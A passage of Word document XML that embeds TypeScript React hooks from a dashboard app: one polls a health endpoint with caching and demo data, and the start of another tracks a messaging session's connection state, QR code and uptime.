          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connected: boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  session: Record&lt;string, unknown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  qr: string | null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  launchTimeline: TimelineStep[]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  patches: PatchInfo[]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  license: LicenseInfo | null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  reconnections: ReconnectionEntry[]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  startedAt: number | null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastEventAt: number | null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Module-level cache ──</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// This persists across page navigations within the same SPA session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">let _cachedHealth: HealthData | null = null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">let _lastFetch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POLL_INTERVAL = 10_000 // 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const STALE_THRESHOLD = 30_000 // consider stale after 30s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useHealth() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { isDemo } = useDemo()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[health, setHealth] = useState&lt;HealthData | null&gt;(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isDemo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status: "ok",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          version: "5.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          connected: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          session: { ready: true, state: "READY" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          qr: null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          launchTimeline: demoLaunchTimeline,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          patches: demoPatches,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          license: demoLicense,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          reconnections: demoReconnections,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          startedAt: Date.now() - 14523_000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          lastEventAt: Date.now(),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_cachedHealth,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[loading, setLoading] = useState(!isDemo &amp;&amp; !_cachedHealth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [error, setError] = useState&lt;string | null&gt;(null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const mountedRef = useRef(true)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fetchHealth = useCallback(async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baseUrl = getApiUrl()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const res = await fetch(`${baseUrl}/health`, {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        signal: AbortSignal.timeout(5000),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(!res.ok) throw new Error(`HTTP ${res.status}`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const data = (await res.json()) as HealthData</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      _cachedHealth = data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      _lastFetch = Date.now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (mountedRef.current) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        setHealth(data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        setError(null)</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if (mountedRef.current) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        setError(err instanceof Error ? err.message : "Failed to fetch health")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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mountedRef.current = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isDemo)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Dynamic polling based on state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Fast polling (5s) initially, slows down significantly (60s) once session is ready</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let intervalId: NodeJS.Timeout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startPolling = async (isFirst = false) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (!isFirst) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await fetchHealth()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      } else if (!_cachedHealth || Date.now() - _lastFetch &gt; STALE_THRESHOLD) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        await fetchHealth()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isReady = _cachedHealth?.session?.ready === true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      const interval = isReady ? 60_000 : 5_000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(mountedRef.current) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        intervalId = setTimeout(() =&gt; startPolling(false), interval)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startPolling(true)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mountedRef.current = false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      clearTimeout(intervalId)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[isDemo, fetchHealth])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health,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    loading,</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refetch: fetchHealth,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Convenience accessors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    timeline: health?.launchTimeline ?? [],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    patches: health?.patches ?? [],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    license: health?.license ?? null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    reconnections: health?.reconnections ?? [],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    connected: health?.connected ?? false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: health?.session ?? null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    qr: health?.qr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apps/dashboard-neo/src/lib/hooks/use-health.ts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apps/dashboard-neo/src/lib/hooks/use-session.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useState, useEffect, useRef } from "react"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { getClient } from "@/lib/api-client"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { useDemo } from "@/lib/demo/use-demo"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { demoSession } from "@/lib/demo/demo-data"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SessionState = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connected: boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  hostNumber: string | null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  waVersion: string | null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  battery: number | null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connectionState: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  uptime: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INITIAL_STATE: SessionState = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connected: false,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  hostNumber: null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  waVersion: null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  battery: null,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  connectionState: "DISCONNECTED",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  uptime: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useSession() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const { isDemo } = useDemo()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [session, setSession] = useState&lt;SessionState&gt;(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    isDemo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connected: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          hostNumber: demoSession.hostNumber,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          waVersion: demoSession.waVersion,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          battery: demoSession.battery,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          connectionState: demoSession.connectionState,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          uptime: demoSession.uptime,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INITIAL_STATE,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[qr, setQr] = useState&lt;string | null&gt;(null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const [loading, setLoading] = useState(!isDemo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const uptimeRef = useRef&lt;ReturnType&lt;typeof setInterval&gt; | null&gt;(null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  const startTimeRef = useRef&lt;number&gt;(Date.now() - (isDemo ? demoSession.uptime * 1000 : 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(typeof window === "undefined")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Demo mode — just tick uptime, no socket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (isDemo) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      uptimeRef.current = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
